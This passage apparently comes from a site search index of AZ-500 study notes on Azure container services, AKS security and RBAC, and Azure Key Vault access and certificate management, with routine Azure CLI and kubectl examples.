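          --dns-name-label customlabel \
          --ports 80

        # Open an interactive shell in the running container (over HTTPS/TLS)
        az container exec --resource-group rg-demo --name aci-demo --exec-command "/bin/sh"
        ```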

        Container deployment: Deploy containers from DockerHub or Azure Container Registry.

        Hypervisor-level security: Historically, containers have offered application dependency isolation and resource governance but have not been considered sufficiently hardened for hostile multi-tenant usage. Azure Container Instances guarantees your application is as isolated in a container as it would be in a VM.

        Custom sizes: Containers are typically optimized to run just a single application, but the exact needs of those applications can differ greatly. Azure Container Instances provides optimum utilization by allowing exact specifications of CPU cores and memory. You pay based on what you need and get billed by the second, so you can fine-tune your spending based on actual need.

        Persistent storage: To retrieve and persist state with Azure Container Instances, we offer direct mounting of Azure Files shares backed by Azure Storage.

        Flexible billing: Supports per-GB, per-CPU, and per-second billing.

        Linux and Windows containers: Azure Container Instances can schedule both Windows and Linux containers with the same API. Simply specify the OS type when you create your container groups. For Windows container deployments, use images based on common Windows base images. Some features are currently restricted to Linux containers:

        • Multiple containers per container group
        • Volume mounting (Azure Files, emptyDir, GitRepo, secret)
        • Resource usage metrics with Azure Monitor
        • Virtual network deployment
        • GPU resources (preview)

        Co-scheduled groups: Azure Container Instances supports scheduling of multi-container groups that share a host machine, local network, storage, and lifecycle. This enables you to combine your main application container with other supporting role containers, such as logging sidecars.

        Virtual network deployment: Currently available for production workloads in a subset of Azure regions, this feature of Azure Container Instances enables deployment of container instances into an Azure virtual network. By deploying container instances into a subnet within your virtual network, they can communicate securely with other resources in the virtual network, including those that are on premises (through VPN gateway or ExpressRoute).

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#43-azure-container-registry-acr","title":"4.3. Azure Container Registry (ACR)","text":"

        A container registry is a service that stores and distributes container images. Docker Hub is a public container registry that supports the open source community and serves as a general catalog of images. Azure Container Registry provides users with direct control of their images, with integrated authentication, geo-replication supporting global distribution and reliability for network-close deployments, virtual network and firewall configuration, tag locking, and many other enhanced features.

        In addition to Docker container images, Azure Container Registry supports related content artifacts including Open Container Initiative (OCI) image formats.

        You log in to a registry using the Azure CLI or the standard docker login command. Azure Container Registry transfers container images over HTTPS, and supports TLS to secure client connections. Azure Container Registry requires all secure connections from servers and applications to use TLS 1.2. Enable TLS 1.2 by using any recent docker client (version 18.03.0 or later). You control access to a container registry using an Azure identity, a Microsoft Entra ID-backed service principal, or a provided admin account. Use role-based access control (RBAC) to assign users or systems fine-grained permissions to a registry.
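
        For example, both login flows described above can be sketched as follows (the registry name acrdemo123 is hypothetical):

        ```
        # Individual login backed by Microsoft Entra ID (reuses the az login token)
        az acr login --name acrdemo123

        # Or the standard Docker login against the registry endpoint (TLS-secured)
        docker login acrdemo123.azurecr.io
        ```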

        Container registries manage repositories, collections of container images or other artifacts with the same name, but different tags. For example, the following three images are in the \"acr-helloworld\" repository:

        • acr-helloworld:latest
        • acr-helloworld:v1
        • acr-helloworld:v2

        A container image or other artifact within a registry is associated with one or more tags, has one or more layers, and is identified by a manifest. Understanding how these components relate to each other can help you manage your registry effectively.

        As with any IT environment, you should consistently monitor activity and user access to your container ecosystem to quickly identify any suspicious or malicious activity. The container monitoring solution in Log Analytics can help you view and manage your Docker and Windows container hosts in a single location.

        By using Log Analytics, you can:

        • View detailed audit information that shows commands used with containers.
        • Troubleshoot containers by viewing and searching centralized logs without having to remotely view Docker or Windows hosts.
        • Find containers that may be noisy and consuming excess resources on a host.
        • View centralized CPU, memory, storage, and network usage and performance information for containers.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#44-azure-container-registry-authentication","title":"4.4. Azure Container Registry authentication","text":"

        Individual login with Microsoft Entra ID.- When working with your registry directly, such as pulling images to and pushing images from a development workstation, authenticate by using the az acr login command in the Azure CLI. When you log in with az acr login, the CLI uses the token created when you executed az login to seamlessly authenticate your session with your registry. To complete the authentication flow, Docker must be installed and running in your environment. az acr login uses the Docker client to set a Microsoft Entra token in the docker.config file. Once you've logged in this way, your credentials are cached, and subsequent docker commands in your session do not require a username or password.

        Service Principal.- If you assign a service principal to your registry, your application or service can use it for headless authentication. Service principals allow role-based access to a registry, and you can assign multiple service principals to a registry. Multiple service principals allow you to define different access for different applications. The available roles for a container registry include:

        • AcrPull: pull
        • AcrPush: pull and push
        • Owner: pull, push, and assign roles to other users
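
        For example, a minimal sketch of headless authentication with a pull-only service principal (all names are hypothetical):

        ```
        # Look up the registry's resource ID (hypothetical registry name)
        ACR_ID=$(az acr show --name acrdemo123 --query id --output tsv)

        # Create a service principal scoped to the registry with the AcrPull role
        az ad sp create-for-rbac --name sp-acr-pull --role AcrPull --scopes "$ACR_ID"
        # The returned appId/password pair can then be used for a headless docker login
        ```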

        Admin account.- Each container registry includes an admin user account, which is disabled by default. You can enable the admin user and manage its credentials in the Azure portal, or by using the Azure CLI or other Azure tools. The admin account is provided with two passwords, both of which can be regenerated. Two passwords allow you to maintain connection to the registry by using one password while you regenerate the other. If the admin account is enabled, you can pass the username and either password to the docker login command when prompted for basic authentication to the registry.
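
        A minimal sketch of enabling and using the admin account (the registry name is hypothetical):

        ```
        # Enable the admin user and read its two regenerable passwords
        az acr update --name acrdemo123 --admin-enabled true
        az acr credential show --name acrdemo123

        # Basic authentication; by default the admin username matches the registry name
        docker login acrdemo123.azurecr.io --username acrdemo123
        ```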

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#45-azure-kubernetes-service-aks","title":"4.5. Azure Kubernetes Service (AKS)","text":"

        As application development moves towards a container-based approach, the need to orchestrate and manage resources is important. Kubernetes is the leading platform for reliable scheduling of fault-tolerant application workloads. Azure Kubernetes Service (AKS) is a managed Kubernetes offering that further simplifies container-based application deployment and management.

        Azure Kubernetes Service (AKS) provides a managed Kubernetes service that reduces the complexity for deployment and core management tasks, including coordinating upgrades. The AKS control plane is managed by the Azure platform, and you only pay for the AKS nodes that run your applications. AKS is built on top of the open-source Azure Kubernetes Service Engine (aks-engine).

        Kubernetes cluster architecture: A Kubernetes cluster is divided into two components:

        • Control plane nodes provide the core Kubernetes services and orchestration of application workloads.
        • Nodes run your application workloads.

        Features of Azure Kubernetes Service:

        • Fully managed
        • Public IP and FQDN (Private IP option)
        • Accessed with RBAC or Microsoft Entra ID
        • Deployment of containers
        • Dynamic scale containers
        • Automation of rolling updates and rollbacks of containers
        • Management of storage, network traffic, and sensitive information

        Kubernetes cluster architecture is a set of design recommendations for deploying your containers in a secure and managed configuration. When you create an AKS cluster, a cluster master is automatically created and configured. This cluster master is provided as a managed Azure resource abstracted from the user. There is no cost for the cluster master, only the nodes that are part of the AKS cluster. The cluster master includes the following core Kubernetes components:

        • kube-apiserver - The API server is how the underlying Kubernetes APIs are exposed. This component provides the interaction for management tools, such as kubectl or the Kubernetes dashboard. By default, the Kubernetes API server uses a public IP address and a fully qualified domain name (FQDN). You can control access to the API server using Kubernetes role-based access controls and Microsoft Entra ID.
        • etcd - To maintain the state of your Kubernetes cluster and configuration, the highly available etcd is a key value store within Kubernetes.
        • kube-scheduler - When you create or scale applications, the Scheduler determines what nodes can run the workload and starts them.
        • kube-controller-manager - The Controller Manager oversees a number of smaller Controllers that perform actions such as replicating pods and handling node operations.

        AKS provides a single-tenant cluster master, with a dedicated API server, Scheduler, etc. You define the number and size of the nodes, and the Azure platform configures the secure communication between the cluster master and nodes. Interaction with the cluster master occurs through Kubernetes APIs, such as kubectl or the Kubernetes dashboard.

        This managed cluster master means that you do not need to configure components like a highly available store, but it also means that you cannot access the cluster master directly. Upgrades to Kubernetes are orchestrated through the Azure CLI or Azure portal, which upgrades the cluster master and then the nodes. To troubleshoot possible issues, you can review the cluster master logs through Azure Log Analytics.

        If you need to configure the cluster master in a particular way or need direct access to it, you can deploy your own Kubernetes cluster using aks-engine.

        Nodes and node pools: To run your applications and supporting services, you need a Kubernetes node. An AKS cluster has one or more nodes; each node is an Azure virtual machine (VM) that runs the Kubernetes node components and container runtime:

        • The kubelet is the Kubernetes agent that processes the orchestration requests from the control plane and scheduling of running the requested containers.
        • Virtual networking is handled by the kube-proxy on each node. The proxy routes network traffic and manages IP addressing for services and pods.
        • The container runtime is the component that allows containerized applications to run and interact with additional resources such as the virtual network and storage. In AKS, Moby is used as the container runtime.

        The Azure VM size for your nodes defines how many CPUs, how much memory, and the size and type of storage available (such as high-performance SSD or regular HDD). If you anticipate a need for applications that require large amounts of CPU and memory or high-performance storage, plan the node size accordingly. You can also scale out the number of nodes in your AKS cluster to meet demand.
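
        For instance, creating a small cluster and later scaling it out might look like this sketch (all names and sizes are hypothetical):

        ```
        # Create a two-node cluster with a specific VM size (hypothetical values)
        az aks create --resource-group rg-demo --name aks-demo \
          --node-count 2 --node-vm-size Standard_DS2_v2 --generate-ssh-keys

        # Scale out the node count to meet demand
        az aks scale --resource-group rg-demo --name aks-demo --node-count 5
        ```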

        In AKS, the VM image for the nodes in your cluster is currently based on Ubuntu Linux or Windows Server 2019. When you create an AKS cluster or scale out the number of nodes, the Azure platform creates the requested number of VMs and configures them. There's no manual configuration for you to perform. Agent nodes are billed as standard virtual machines, so any discounts you have on the VM size you're using (including Azure reservations) are automatically applied. If you need to use a different host OS, container runtime, or include custom packages, you can deploy your own Kubernetes cluster using aks-engine. The upstream aks-engine releases features and provides configuration options before they are officially supported in AKS clusters. For example, if you wish to use a container runtime other than Moby, you can use aks-engine to configure and deploy a Kubernetes cluster that meets your current needs.

        Some basic concepts

        • Pools: Group of nodes with identical configuration.
        • Node: Individual VM running containerized applications.
        • Pods: Single instance of an application. A pod can contain multiple containers.
        • Deployment: One or more identical pods managed by Kubernetes.
        • Manifest: YAML file describing a deployment.

        AKS nodes are Azure virtual machines that you manage and maintain. Linux nodes run an optimized Ubuntu distribution using the Moby container runtime. Windows Server nodes run an optimized Windows Server 2019 release and also use the Moby container runtime. When an AKS cluster is created or scaled up, the nodes are automatically deployed with the latest OS security updates and configurations.

        • Linux: The Azure platform automatically applies OS security patches to Linux nodes on a nightly basis. If a Linux OS security update requires a host reboot, that reboot is not automatically performed. You can manually reboot the Linux nodes, or a common approach is to use Kured, an open-source reboot daemon for Kubernetes. Kured runs as a DaemonSet and monitors each node for the presence of a file indicating that a reboot is required. Reboots are managed across the cluster using the same cordon and drain process as a cluster upgrade.
        • Windows: Windows Update does not automatically run and apply the latest updates. On a regular schedule around the Windows Update release cycle and your own validation process, you should perform an upgrade on the Windows Server node pool(s) in your AKS cluster. This upgrade process creates nodes that run the latest Windows Server image and patches, then removes the older nodes. Nodes are deployed into a private virtual network subnet, with no public IP addresses assigned. For troubleshooting and management purposes, SSH is enabled by default. This SSH access is only available using the internal IP address.

        To provide storage, the nodes use Azure Managed Disks. For most VM node sizes, these are Premium disks backed by high-performance SSDs. The data stored on managed disks is automatically encrypted at rest within the Azure platform. To improve redundancy, these disks are also securely replicated within the Azure datacenter.

        Kubernetes environments, in AKS or elsewhere, currently aren't completely safe for hostile multi-tenant usage. Additional security features such as Pod Security Policies or more fine-grained role-based access controls (RBAC) for nodes make exploits more difficult. However, for true security when running hostile multi-tenant workloads, a hypervisor is the only level of security that you should trust. The security domain for Kubernetes becomes the entire cluster, not an individual node. For these types of hostile multi-tenant workloads, you should use physically isolated clusters.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#46-azure-kubernetes-service-networking","title":"4.6. Azure Kubernetes Service networking","text":"

        To allow access to your applications, or for application components to communicate with each other, Kubernetes provides an abstraction layer to virtual networking. Kubernetes nodes are connected to a virtual network, and can provide inbound and outbound connectivity for pods. The kube-proxy component runs on each node to provide these network features.

        In Kubernetes, Services logically group pods to allow for direct access via an IP address or DNS name and on a specific port. You can also distribute traffic using a load balancer. More complex routing of application traffic can also be achieved with Ingress Controllers. Security and filtering of the network traffic for pods is possible with Kubernetes network policies.

        The Azure platform also helps to simplify virtual networking for AKS clusters. When you create a Kubernetes load balancer, the underlying Azure load balancer resource is created and configured. As you open network ports to pods, the corresponding Azure network security group rules are configured. For HTTP application routing, Azure can also configure external DNS as new ingress routes are configured. To sum up:

        • Cluster IP - Creates an internal IP address for use within the AKS cluster. Good for internal-only applications that support other workloads within the cluster.
        • NodePort - Creates a port mapping on the underlying node that allows the application to be accessed directly with the node IP address and port.
        • LoadBalancer - Creates an Azure load balancer resource, configures an external IP address, and connects the requested pods to the load balancer backend pool. To allow customers' traffic to reach the application, load balancing rules are created on the desired ports.
        • ExternalName - Creates a specific DNS entry for easier application access.

        The Network Policy feature in Kubernetes lets you define rules for ingress and egress traffic between pods in a cluster.
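
        As a sketch of the LoadBalancer type, assuming a hypothetical deployment named myapp:

        ```
        # Expose a deployment through an Azure load balancer (hypothetical names/ports)
        kubectl expose deployment myapp --type=LoadBalancer --port=80 --target-port=8080

        # Watch for the external IP assigned by the Azure load balancer
        kubectl get service myapp --watch
        ```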

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#47-azure-kubernetes-service-storage","title":"4.7. Azure Kubernetes Service storage","text":"

        Applications that run in Azure Kubernetes Service (AKS) may need to store and retrieve data.

        A volume represents a way to store, retrieve, and persist data across pods and through the application lifecycle. Traditional volumes to store and retrieve data are created as Kubernetes resources backed by Azure Storage. You can manually create these data volumes to be assigned to pods directly, or have Kubernetes automatically create them. These data volumes can use Azure Disks or Azure Files:

        • Azure Disks can be used to create a Kubernetes DataDisk resource. Disks can use Azure Premium storage, backed by high-performance SSDs, or Azure Standard storage, backed by regular HDDs. For most production and development workloads, use Premium storage. Azure Disks are mounted as ReadWriteOnce, so are only available to a single pod. For storage volumes that can be accessed by multiple pods simultaneously, use Azure Files.
        • Azure Files can be used to mount an SMB 3.0 share backed by an Azure Storage account to pods. Files let you share data across multiple nodes and pods. Files can use Azure Standard storage backed by regular HDDs, or Azure Premium storage, backed by high-performance SSDs.

        Volumes that are defined and created as part of the pod lifecycle only exist until the pod is deleted. Pods often expect their storage to remain if a pod is rescheduled on a different host during a maintenance event, especially in StatefulSets. A persistent volume (PV) is a storage resource created and managed by the Kubernetes API that can exist beyond the lifetime of an individual pod.

        A Persistent Volume can be statically created by a cluster administrator, or dynamically created by the Kubernetes API server. If a pod is scheduled and requests storage that is not currently available, Kubernetes can create the underlying Azure Disk or Files storage and attach it to the pod. Dynamic provisioning uses a StorageClass to identify what type of Azure storage needs to be created.

        To define different tiers of storage, such as Premium and Standard, you can create a Storage Class. The StorageClass also defines the reclaimPolicy. This reclaimPolicy controls the behavior of the underlying Azure storage resource when the pod is deleted and the persistent volume may no longer be required. The underlying storage resource can be deleted, or retained for use with a future pod. In AKS, two initial StorageClasses are created:

        • default\u00a0- Uses Azure Standard storage to create a Managed Disk. The reclaim policy indicates that the underlying Azure Disk is deleted when the persistent volume that used it is deleted.
        • managed-premium - Uses Azure Premium storage to create a Managed Disk. The reclaim policy again indicates that the underlying Azure Disk is deleted when the persistent volume that used it is deleted.

        If no StorageClass is specified for a persistent volume, the default StorageClass is used.

        A PersistentVolumeClaim requests either Disk or File storage of a particular StorageClass, access mode, and size. The Kubernetes API server can dynamically provision the underlying storage resource in Azure if there is no existing resource to fulfill the claim based on the defined StorageClass. The pod definition includes the volume mount once the volume has been connected to the pod. A PersistentVolume is bound to a PersistentVolumeClaim once an available storage resource has been assigned to the pod requesting it. There is a 1:1 mapping of persistent volumes to claims.
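
        A minimal claim against the managed-premium class might look like this sketch (the claim name and size are hypothetical):

        ```
        # Dynamically provision a Premium managed disk via a PersistentVolumeClaim
        kubectl apply -f - <<EOF
        apiVersion: v1
        kind: PersistentVolumeClaim
        metadata:
          name: premium-claim        # hypothetical name
        spec:
          accessModes:
            - ReadWriteOnce          # Azure Disks attach to a single pod
          storageClassName: managed-premium
          resources:
            requests:
              storage: 5Gi
        EOF
        ```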

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#48-secure-authentication-to-azure-kubernetes-service-with-active-directory","title":"4.8. Secure authentication to Azure Kubernetes Service with Active Directory","text":"

        There are basically two mechanisms to secure authentication to Azure Kubernetes Service:

        • Kubernetes service accounts: One of the primary user types in Kubernetes is a service account. A service account exists in, and is managed by, the Kubernetes API. The credentials for service accounts are stored as Kubernetes secrets, which allows them to be used by authorized pods to communicate with the API Server. Most API requests provide an authentication token for a service account or a normal user account. Normal user accounts allow more traditional access for human administrators or developers, not just services and processes. Kubernetes itself doesn't provide an identity management solution where regular user accounts and passwords are stored. Instead, external identity solutions can be integrated into Kubernetes. For AKS clusters, this integrated identity solution is Microsoft Entra ID.
        • Microsoft Entra integration: The security of AKS clusters can be enhanced with the integration of Microsoft Entra ID. With Microsoft Entra ID, you can integrate on-premises identities into AKS clusters to provide a single source for account management and security. With Microsoft Entra integrated AKS clusters, you can grant users or groups access to Kubernetes resources within a namespace or across the cluster. To obtain a Kubectl configuration context, a user can run the az aks get-credentials command. When a user then interacts with the AKS cluster with kubectl, they are prompted to sign in with their Microsoft Entra credentials. This approach provides a single source for user account management and password credentials. The user can only access the resources as defined by the cluster administrator.

        Microsoft Entra authentication in AKS clusters uses OpenID Connect, an identity layer built on top of the OAuth 2.0 protocol. OAuth 2.0 defines mechanisms to obtain and use access tokens to access protected resources, and OpenID Connect implements authentication as an extension to the OAuth 2.0 authorization process.
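
        In practice, the credential flow described above can be sketched as follows (the cluster names are hypothetical):

        ```
        # Fetch a kubectl context for the Entra-integrated cluster (hypothetical names)
        az aks get-credentials --resource-group rg-demo --name aks-demo

        # The first kubectl call then prompts for a Microsoft Entra sign-in
        kubectl get nodes
        ```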

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#49-access-to-azure-kubernetes-service-using-azure-role-based-access-controls","title":"4.9. Access to Azure Kubernetes Service using Azure role-based access controls","text":"

        Azure role-based access control (RBAC) is an authorization system built on\u00a0Azure Resource Manager\u00a0that provides fine-grained access management of Azure resources.

        | RBAC system | Description |
        | --- | --- |
        | Kubernetes RBAC | Designed to work on Kubernetes resources within your AKS cluster. |
        | Azure RBAC | Designed to work on resources within your Azure subscription. |

        There are two levels of access needed to fully operate an AKS cluster:

        • Access the AKS resource in your Azure subscription.
          • Control scaling or upgrading your cluster using the AKS APIs.
          • Pull your kubeconfig.
        • Access to the Kubernetes API. This access is controlled by either:
          • Kubernetes RBAC\u00a0(traditionally).
          • Integrating Azure RBAC with AKS for Kubernetes authorization.

        Before you assign permissions to users with Kubernetes RBAC, you first define those permissions as a Role. Kubernetes roles grant permissions. There is no concept of a deny permission.

        Roles are used to grant permissions within a namespace. If you need to grant permissions across the entire cluster, or to cluster resources outside a given namespace, you can instead use ClusterRoles.

        A ClusterRole works in the same way to grant permissions to resources, but can be applied to resources across the entire cluster, not a specific namespace.

        Once roles are defined to grant permissions to resources, you assign those Kubernetes RBAC permissions with a RoleBinding. If your AKS cluster integrates with Microsoft Entra ID, bindings are how those Microsoft Entra users are granted permissions to perform actions within the cluster.

        A ClusterRoleBinding works in the same way to bind roles to users, but can be applied to resources across the entire cluster, not a specific namespace. This approach lets you grant administrators or support engineers access to all resources in the AKS cluster.
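
        A minimal sketch of a namespaced Role plus RoleBinding for a Microsoft Entra user (the namespace and user are hypothetical):

        ```
        # Grant read-only access to pods in the "dev" namespace (hypothetical values)
        kubectl create role pod-reader --verb=get --verb=list --verb=watch \
          --resource=pods --namespace dev

        # Bind the role to a specific user
        kubectl create rolebinding read-pods --role=pod-reader \
          --user=dev-user@contoso.com --namespace dev
        ```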

        Secrets at Linux: A Kubernetes Secret is used to inject sensitive data into pods, such as access credentials or keys. You first create a Secret using the Kubernetes API. When you define your pod or deployment, a specific Secret can be requested. Secrets are only provided to nodes that have a scheduled pod that requires it, and the Secret is stored in tmpfs, not written to disk. When the last pod on a node that requires a Secret is deleted, the Secret is deleted from the node's tmpfs. Secrets are stored within a given namespace and can only be accessed by pods within the same namespace. The use of Secrets reduces the sensitive information that is defined in the pod or service YAML manifest. Instead, you request the Secret stored in Kubernetes API Server as part of your YAML manifest. This approach only provides the specific pod access to the Secret. Please note: a raw secret manifest file contains the secret data in base64 format, so it should be treated as sensitive information and never committed to source control.
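
        As a sketch, creating and inspecting a Secret (the name and value are hypothetical):

        ```
        # Create a Secret via the Kubernetes API (hypothetical name/value)
        kubectl create secret generic db-creds --from-literal=password='S3cr3t!'

        # Note the base64-encoded (not encrypted) data in the manifest output
        kubectl get secret db-creds --output yaml
        ```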

        Secrets in Windows containers: Secrets are written in clear text on the node's volume (as compared to tmpfs/in-memory on Linux). This means customers have to do two things:

        • Use file ACLs to secure the secrets file location
        • Use volume-level encryption using BitLocker
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/","title":"III. Data and applications","text":"Sources of these notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500\".
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#1-azure-key-vault","title":"1. Azure Key Vault","text":"

        Azure Key Vault helps safeguard cryptographic keys and secrets that cloud applications and services use. Key Vault streamlines the key management process and enables you to maintain control of keys that access and encrypt your data. Developers can create keys for development and testing in minutes, and then migrate them to production keys. Security administrators can grant (and revoke) permission to keys, as needed. You can use Key Vault to create multiple secure containers, called vaults. Vaults help reduce the chances of accidental loss of security information by centralizing application secrets storage. Key vaults also control and log the access to anything stored in them.

        Azure Key Vault helps address the following issues:

        • Secrets management. You can use Azure Key Vault to securely store and tightly control access to tokens, passwords, certificates, API keys, and other secrets.
        • Key management. You use Azure Key Vault as a key management solution, making it easier to create and control the encryption keys used to encrypt your data.
        • Certificate management. Azure Key Vault is also a service that lets you easily provision, manage, and deploy public and private SSL/TLS certificates for use with Azure and your internal connected resources.
        • Store secrets backed by hardware security modules (HSMs). The secrets and keys can be protected either by software or by FIPS 140-2 Level 2 validated HSMs.

        Key Vault is not intended as storage for user passwords.

        Access to a key vault is controlled through two separate interfaces: management plane, and data plane. The management plane and data plane access controls work independently. Use RBAC to control what users have access to. For example, if you want to grant an application access to use keys in a key vault, you only need to grant data plane access permissions by using key vault access policies, and no management plane access is needed for this application. Conversely, if you want a user to be able to read vault properties and tags but not have any access to keys, secrets, or certificates, you can grant this user read access by using RBAC, and no access to the data plane is required.

        If a user has contributor permissions (RBAC) to a key vault management plane, they can grant themselves access to the data plane by setting a key vault access policy. We recommend that you tightly control who has contributor access to your key vaults, to ensure that only authorized persons can access and manage your key vaults, keys, secrets, and certificates.
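
        For example, granting an application data plane access via an access policy, with no management plane role at all, might be sketched as follows (the names and app ID are hypothetical placeholders):

        ```
        # Create a vault, then grant an application data-plane-only access
        az keyvault create --resource-group rg-demo --name kv-demo-123 --location westeurope
        az keyvault set-policy --name kv-demo-123 \
          --spn <app-id> \
          --key-permissions get list \
          --secret-permissions get
        ```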

        Azure Resource Manager can securely deploy certificates stored in Azure Key Vault to Azure VMs when the VMs are deployed. By setting appropriate access policies for the key vault, you also control who gets access to your certificate. Another benefit is that you manage all your certificates in one place in Azure Key Vault.

        Deletion of key vaults or key vault objects can be either inadvertent or malicious. Enable the soft delete and purge protection features of Key Vault, particularly for keys that are used to encrypt data at rest. Deletion of these keys is equivalent to data loss, so you can recover deleted vaults and vault objects if needed. Practice Key Vault recovery operations on a regular basis.
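
        A minimal sketch of this hardening and recovery (the vault and secret names are hypothetical):

        ```
        # Opt in to purge protection (soft delete is on by default for new vaults)
        az keyvault update --name kv-demo-123 --enable-purge-protection true

        # Recover a soft-deleted secret during the retention window
        az keyvault secret recover --vault-name kv-demo-123 --name db-password
        ```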

        Azure Key Vault is offered in two service tiers: standard and premium. The main difference between Standard and Premium is that Premium supports HSM-protected keys.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#11-configure-key-vault-access","title":"1.1. Configure Key Vault access","text":"

        Access to a key vault is controlled through two interfaces: the management plane, and the data plane. The management plane is where you manage Key Vault itself. Operations in this plane include creating and deleting key vaults, retrieving Key Vault properties, and updating access policies. The data plane is where you work with the data stored in a key vault. You can add, delete, and modify keys, secrets, and certificates from here.

        To access a key vault in either plane, all callers (users or applications) must have proper authentication and authorization. Authentication establishes the identity of the caller. Authorization determines which operations the caller can execute.

        Both planes use Microsoft Entra ID for authentication. For authorization, the management plane uses RBAC, and the data plane can use either\u00a0newly added RBAC\u00a0or a Key Vault access policy.

        When you create a key vault in an Azure subscription, it's automatically associated with the Microsoft Entra tenant of the subscription. Applications can access Key Vault in two ways:

        • User plus application access. The application accesses Key Vault on behalf of a signed-in user. Examples of this type of access include Azure PowerShell and the Azure portal. User access is granted in two ways: users can either access Key Vault from any application, or they can be required to use a specific application (referred to as compound identity).
        • Application-only access. The application runs as a daemon service or background job. The application identity is granted access to the key vault.

        For both types of access, the application authenticates with Microsoft Entra ID. The model of a single mechanism for authentication to both planes has several benefits:

        • Organizations can centrally control access to all key vaults in their organization.
        • If a user leaves, they instantly lose access to all key vaults in the organization.
        • Organizations can customize authentication by using the options in Microsoft Entra ID, such as to enable multifactor authentication for added security.
        | Role | Management plane permissions | Data plane permissions |
        | --- | --- | --- |
        | Security team | Key Vault Contributor | Keys: backup, create, delete, get, import, list, restore. Secrets: all operations |
        | Developers and operators | Key Vault deploy permission. Note: This permission allows deployed VMs to fetch secrets from a key vault. | None |
        | Auditors | None | Keys: list. Secrets: list. Note: This permission enables auditors to inspect attributes (tags, activation dates, expiration dates) for keys and secrets not emitted in the logs. |
        | Application | None | Keys: sign. Secrets: get |

        The three team roles need access to other resources along with Key Vault permissions. To deploy VMs (or the Web Apps feature of Azure App Service), developers and operators need Contributor access to those resource types. Auditors need read access to the Storage account where the Key Vault logs are stored.

        Some built-in RBAC in Azure:

        | Built-in role | Description | ID |
        | --- | --- | --- |
        | Key Vault Administrator | Perform all data plane operations on a key vault and all objects in it, including certificates, keys, and secrets. Cannot manage key vault resources or manage role assignments. Only works for key vaults that use the 'Azure role-based access control' permission model. | 00482a5a-887f-4fb3-b363-3b7fe8e74483 |
        | Key Vault Certificates Officer | Perform any action on the certificates of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. | a4417e6f-fecd-4de8-b567-7b0420556985 |
        | Key Vault Crypto Officer | Perform any action on the keys of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. | 14b46e9e-c2b7-41b4-b07b-48a6ebf60603 |
        | Key Vault Crypto Service Encryption User | Read metadata of keys and perform wrap/unwrap operations. Only works for key vaults that use the 'Azure role-based access control' permission model. | e147488a-f6f5-4113-8e2d-b22465e65bf6 |
        | Key Vault Crypto User | Perform cryptographic operations using keys. Only works for key vaults that use the 'Azure role-based access control' permission model. | 12338af0-0e69-4776-bea7-57ae8d297424 |
        | Key Vault Reader | Read metadata of key vaults and its certificates, keys, and secrets. Cannot read sensitive values such as secret contents or key material. Only works for key vaults that use the 'Azure role-based access control' permission model. | 21090545-7ca7-4776-b22c-e363652d74d2 |
        | Key Vault Secrets Officer | Perform any action on the secrets of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. | b86a8fe4-44ce-4948-aee5-eccb2c155cd7 |
        | Key Vault Secrets User | Read secret contents including secret portion of a certificate with private key. Only works for key vaults that use the 'Azure role-based access control' permission model. | 4633458b-17de-408a-b874-0445c86b69e6 |
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#12-deploy-and-manage-key-vault-certificates","title":"1.2. Deploy and manage Key Vault certificates","text":"

        Key Vault certificates support provides for management of your x509 certificates and enables:

        • A certificate owner to create a certificate through a Key Vault creation process or through the import of an existing certificate. Includes both self-signed and CA-generated certificates.
        • A Key Vault certificate owner to implement secure storage and management of X509 certificates without interaction with private key material.
        • A certificate owner to create a policy that directs Key Vault to manage the life-cycle of a certificate.
        • Certificate owners to provide contact information for notification about lifecycle events of expiration and renewal of certificate.
        • Automatic renewal with selected issuers - Key Vault partner X509 certificate providers and CAs.

        When a Key Vault certificate is created, an addressable key and secret are also created with the same name. The Key Vault key allows key operations and the Key Vault secret allows retrieval of the certificate value as a secret. A Key Vault certificate also contains public x509 certificate metadata.

        When a Key Vault certificate is created, it can be retrieved from the addressable secret with the private key in either PFX or PEM format. However, the policy used to create the certificate must indicate that the key is exportable. If the policy indicates non-exportable, then the private key isn't a part of the value when retrieved as a secret.

        The addressable key becomes more relevant with non-exportable Key Vault certificates. The addressable Key Vault key's operations are mapped from the keyusage field of the Key Vault certificate policy used to create the Key Vault certificate. If a Key Vault certificate expires, its addressable key and secret become inoperable.

        Two types of key are supported with certificates: RSA or RSA HSM. Exportable is only allowed with RSA, and is not supported by RSA HSM.

        Certificate policy

        A certificate policy contains information on how to create and manage the Key Vault certificate lifecycle. When a certificate with private key is imported into the Key Vault, a default policy is created by reading the x509 certificate. When a Key Vault certificate is created from scratch, a policy needs to be supplied. This policy specifies how to create the Key Vault certificate version, or the next Key Vault certificate version. At a high level, a certificate policy contains the following information:

        • X509 certificate properties. Contains subject name, subject alternate names, and other properties used to create an x509 certificate request.
        • Key Properties. Contains key type, key length, exportable, and reuse key fields. These fields instruct key vault on how to generate a key.
